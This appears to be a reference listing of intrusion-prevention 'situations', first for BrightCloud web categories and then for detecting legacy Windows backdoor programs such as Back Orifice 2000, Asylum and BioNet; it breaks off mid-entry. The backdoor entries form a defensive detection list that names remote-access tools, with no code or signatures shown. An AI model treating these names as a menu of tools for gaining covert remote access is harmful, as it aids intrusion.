Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Personal sites and Blogs". The category is described as follows: Personal websites posted by individuals or groups, as well as blogs. Examples include: * http://blogspot.com * http://greatamericanphotocontest.com * http://sites.google.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Personal-Storage

About this situation: BrightCloud category Personal Storage
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology, Network Bandwidth Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Personal Storage". The category is described as follows: Online storage and posting of files, music, pictures, and other data. Examples include: * http://photobucket.com * http://filecloud.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Philosophy-and-Political-Advocacy

About this situation: BrightCloud category Philosophy and Political Advocacy
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Philosophy and Political Advocacy". The category is described as follows: Politics, philosophy, discussions, promotion of a particular viewpoint or stance in order to further a cause. Examples include: * http://stopthefetincrease.com * http://climatecrisis.net $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Phishing-and-Other-Frauds

About this situation: BrightCloud category Phishing and Other Frauds
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Phishing and Other Frauds". The category is described as follows: Phishing, pharming, and other sites that pose as a reputable site, usually to harvest personal information from a user. Examples include: * http://xanga.com/apache19 * http://mujweb.cz/www/signx/index.htm $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Private-IP-Addresses

About this situation: BrightCloud category Private IP Addresses
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Private IP Addresses". The category is described as follows: These are blocks of IP Addresses that have been set aside for individual companies and other entities. Here are some examples: * GE owns 3.0.0.0/8 (Business and Economy) * U.S. Army owns 6.0.0.0/8 (Military) * Level 3 Communications owns 8.0.0.0/8 (Internet Communications) * IBM owns 9.0.0.0/8 (Business and Economy) * AT&T owns 12.0.0.0/8 (Business and Economy) * Xerox owns 13.0.0.0/8 (Business and Economy) * HP owns 15.0.0.0/8 and 16.0.0.0/8 (Business and Economy) * Apple owns 17.0.0.0/8 (Business and Economy) * BBN Communications owns 128.1.0.0/16 (Internet Communications) * Carnegie Mellon University owns 128.2.0.0/16 (Educational Institutions) This category DOES NOT include IP addresses defined in RFC 1918, 'Address Allocation for Private Intranets' which are: * 10.0.0.0 - 10.255.255.255 (10/8 prefix) * 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) * 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) * 169.254.0.0 - 169.254.255.255 (169.254/16 prefix) These IP addresses are best tested for locally, rather than ask the BrightCloud Service for URL content and reputation information on them. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Proxy-Avoidance-and-Anonymizers

About this situation: BrightCloud category Proxy Avoidance and Anonymizers
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk, Legal Liability
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Proxy Avoidance and Anonymizers". The category is described as follows: Proxy servers and other methods to gain access to URLs in any way that bypasses URL filtering or monitoring. * http://proxy.org * http://kproxy.org * http://bossofvideo.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Questionable

About this situation: BrightCloud category Questionable
Context: HTTP BrightCloud Category
Severity: 1
Tags: Mature / Violent, Legal Liability
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Questionable". The category is described as follows: Tasteless humor blogs or comics, "get rich quick" sites, and other sites with dubious objectives and borderline security risks. Examples include: * http://collegehumor.com/ * http://mywaytogetrich.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Real-Estate

About this situation: BrightCloud category Real Estate
Context: HTTP BrightCloud Category
Severity: 1
Tags: Purchasing, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Real Estate". The category is described as follows: Information on renting, buying, or selling real estate or properties. Tips on buying or selling a home. Real estate agents, Rental or relocation services, and property improvement. Examples include: * http:// prudentialproperties.com * http://realtor.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Recreation-and-Hobbies

About this situation: BrightCloud category Recreation and Hobbies
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Recreation and Hobbies". The category is described as follows: Information, associations, forums and publications on recreational pastimes such as collecting, kit airplanes, outdoor activities such as hiking, camping, rock climbing, specific arts, craft, or techniques; animal and pet related information, including breed-specifics, training, shows and humane societies. Examples include: * http://genealogy.com * http://craftster.org $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Reference-and-Research

About this situation: BrightCloud category Reference and Research
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Reference and Research". The category is described as follows: Personal, professional, or educational reference material, including online dictionaries, maps, census, almanacs, library catalogues, genealogy, and scientific information. Examples include: * http://reference.com * http://wikipedia.org $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Religion

About this situation: BrightCloud category Religion
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Religion". The category is described as follows: Conventional or unconventional religious or quasi-religious subjects, as well as churches, synagogues, or other houses of worship. Examples include: * http://geocities.com/northchristianchurch * http://biblesociety.ca $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Search-Engines

About this situation: BrightCloud category Search Engines
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Search Engines". The category is described as follows: Search interfaces using key words or phrases. Returned results may include text, websites, images, videos, and files. Examples include: * http://google.com * http://sogou.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Server-Error

About this situation: BrightCloud Categorization Server Error
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns "service unavailable" or "service down" error. This may be local service configuration error, or error condition at the service provider. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Service-Down

About this situation: BrightCloud Categorization Service Down
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the service is not responding. This could be a problem in the engine or in the network connectivity. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Sex-Education

About this situation: BrightCloud category Sex Education
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Sex Education". The category is described as follows: Information on reproduction, sexual development, safe sex practices, sexually transmitted diseases, sexuality, birth control, sexual development, tips for better sex as well as products used for sexual enhancement, and contraceptives. Examples include: * http://wikipedia.org/wiki/Sexual_health_clinic * http://prostate-pleasure.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Shareware-and-Freeware

About this situation: BrightCloud category Shareware and Freeware
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology, Network Bandwidth Loss, Productivity Loss, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Shareware and Freeware". The category is described as follows: Software, screensavers, icons, wallpapers, utilities, ringtones. Includes downloads that request a donation, and open source projects. Examples include: * http://download.com * http://sourceforge.net $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Shopping

About this situation: BrightCloud category Shopping
Context: HTTP BrightCloud Category
Severity: 1
Tags: Purchasing, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Shopping". The category is described as follows: Department stores, retail stores, company catalogs and other sites that allow online consumer or business shopping and the purchase of goods and services. Examples include: * http://amazon.com * http://home.dangdang.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Social-Networking

About this situation: BrightCloud category Social Networking
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Social Networking". The category is described as follows: Social Networking sites used for personal communication. Examples include: * http://facebook.com * http://linkedin.com * http://twitter.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Society

About this situation: BrightCloud category Society
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Society". The category is described as follows: A variety of topics, groups, and assocations relevant to the general populace, broad issues that impact a variety of people, including safety, children, societies, and philanthropic groups. Examples include: * http://dar.org * http://supermama.lt $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_SPAM-URLs

About this situation: BrightCloud category SPAM URLs
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Productivity Loss, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "SPAM URLs". The category is described as follows: URLs contained in SPAM. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Sports

About this situation: BrightCloud category Sports
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Sports". The category is described as follows: Team or conference web sites, international, national, international, college, professional scores and schedules, Sports-related online magazines or newsletters, fantasy sports and virtual sports leagues. Examples include: * http://nba.com * http://schoenen-dunk.de $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Spyware-and-Adware

About this situation: BrightCloud category Spyware and Adware
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Spyware and Adware". The category is described as follows: Spyware or Adware sites that provide or promote information gathering or tracking that is unknown to, or without the explicit consent of, the end user or the organization, also unsolicited advertising popups and programs that may be installed on a user's computer. Examples include: * http://allsecuritylinks.com * http://askyaya.com/ $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Streaming-Media

About this situation: BrightCloud category Streaming Media
Context: HTTP BrightCloud Category
Severity: 1
Tags: Entertainment / Culture, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Streaming Media". The category is described as follows: Sales, delivery, or streaming of audio or video content, including sites that provide downloads for such viewers. Examples include: * http://ezlink.net * http://strawberrytv.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Swimsuits-and-Intimate-Apparel

About this situation: BrightCloud category Swimsuits and Intimate Apparel
Context: HTTP BrightCloud Category
Severity: 1
Tags: Mature / Violent, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Swimsuits and Intimate Apparel". The category is described as follows: Swimsuits, intimate apparel or other types of suggestive clothing. Examples include: * http://victoriassecret.com * http://brazilianswimwear.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Training-and-Tools

About this situation: BrightCloud category Training and Tools
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Training and Tools". The category is described as follows: Distance education and trade schools, online courses, vocational training, software training, and skills training. This includes blogs or games for educational purposes. Examples include: * http://trainingtools.com * http://guidetocareereducation.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Translation-Sites

About this situation: BrightCloud category Translation Sites
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Translation Sites". The category is described as follows: Translation web sites used for language translation. These can also be used as anonymizers and proxy bypassing. Examples include: * http://translate.google.com * http://microsofttranslator.com * http://worldlingo.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Travel

About this situation: BrightCloud category Travel
Context: HTTP BrightCloud Category
Severity: 1
Tags: Lifestyle, Productivity Loss, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Travel". The category is described as follows: Airlines and flight booking agencies. Travel planning, reservations, vehicle rentals, descriptions of travel destinations, or promotions for hotels or casinos. Car Rentals. Examples include: * http://cheapflights.com * http://expedia.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Unconfirmed-SPAM-Sources

About this situation: BrightCloud category Unconfirmed SPAM Sources
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Unconfirmed SPAM Sources". The category is described as follows: Sites - usually IP addresses - that may be origination sources of SPAM. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Unknown

About this situation: BrightCloud category Unknown
Context: HTTP BrightCloud Category
Severity: 1
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page was not found in any of the available BrightCloud databases, so there is no BrightCloud category for this page. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Unknown-Error

About this situation: BrightCloud Categorization Unknown Error
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns unknown error value. If the problem persists, please contact your Stonesoft product support. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Violence

About this situation: BrightCloud category Violence
Context: HTTP BrightCloud Category
Severity: 1
Tags: Mature / Violent, Legal Liability
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Violence". The category is described as follows: Sites that advocate violence, depictions, and methods, including game/comic violence and suicide. Examples include: * http://sfdt.com * http://happytreefriends.com * http://torturegame.org/ $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Weapons

About this situation: BrightCloud category Weapons
Context: HTTP BrightCloud Category
Severity: 1
Tags: Mature / Violent, Legal Liability
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Weapons". The category is described as follows: Sales, reviews, or descriptions of weapons such as guns, knives or martial arts devices, or provide information on their use, accessories, or other modifications. Examples include: * http://browning.com * http://e-gunparts.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Web-Advertisements

About this situation: BrightCloud category Web Advertisements
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Web Advertisements". The category is described as follows: Advertisements, media, content, and banners. Examples include: * http://casalemedia.com * http://oinadserver.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Web-based-email

About this situation: BrightCloud category Web based email
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Communication, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Web based email". The category is described as follows: Sites offering web based email and email clients. Examples include: * http://google.com/mail * http://foxmail.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Web-Hosting

About this situation: BrightCloud category Web Hosting
Context: HTTP BrightCloud Category
Severity: 1
Tags: Purchasing, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Web Hosting". The category is described as follows: Free or paid hosting services for web pages and information concerning their development, publication and promotion. Examples include: * http://siteground.com * http://bluehost.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BD-TCP_Amanda-Request

About this situation: Amanda backdoor client request
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Amanda, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-Amanda
Description:
Back to top

BD-TCP_Amanda-Response

About this situation: Amanda backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Amanda, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-Amanda
Description:
Back to top

BD-TCP_AOL-Admin-Response

About this situation: AOL Admin backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, AOL Admin, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-AOL-Admin
Description:
Back to top

BD-TCP_Asylum-Request

About this situation: Asylum backdoor request detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Asylum, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Asylum
Description:
Back to top

BD-TCP_Asylum-Response

About this situation: Asylum backdoor response detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Asylum, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Asylum
Description:
Back to top

BD-TCP_Back-Orifice-2000

About this situation: Back Orifice 2000 Access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-BackOrifice2000
Description:
Back to top

BD-TCP_Backage-Request

About this situation: Backage backdoor client request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Backage, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-164-2032
Vulnerability: Backdoor-Backage
Description:
Back to top

BD-TCP_BackConstruction-Request

About this situation: BackConstruction backdoor client request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, BackConstruction, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-534-5211
Vulnerability: Backdoor-BackConstruction
Description:
Back to top

BD-TCP_BackConstruction-Response

About this situation: BackConstruction backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, BackConstruction, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-BackConstruction
Description:
Back to top

BD-TCP_BackDoor-Request

About this situation: BackDoor program request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, CVE1999, Windows NT not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-BackDoor
Description:
Back to top

BD-TCP_BackDoor-Response

About this situation: BackDoor program response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, CVE1999, Windows NT not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: Backdoor-BackDoor
Description:
Back to top

BD-TCP_Backdoor-XLog-2.2-Banner-1

About this situation: BD Xlog 2.2 Banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, XLog, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-XLog-2-2
Description:
Back to top

BD-TCP_Basic-Hell-Response

About this situation: Basic Hell backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Basic Hell, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Basic-Hell
Description:
Back to top

BD-TCP_BDDT-Response

About this situation: BDDT backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-BDDT
Description:
Back to top

BD-TCP_BioNet-Request

About this situation: BioNet backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, BioNet, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-BioNet
Description:
Back to top

BD-TCP_BioNet-Response

About this situation: BioNet backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, BioNet, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-BioNet
Description:
Back to top

BD-TCP_Black-Angel-Response

About this situation: Black Angel backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Black Angel, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: Backdoor-Black-Angel
Description:
Back to top

BD-TCP_Blade-Runner-Response

About this situation: Blade Runner backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Blade Runner, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Blade-Runner
Description:
Back to top

BD-TCP_Blazer5-Response

About this situation: Blazer5 backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Blazer5, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
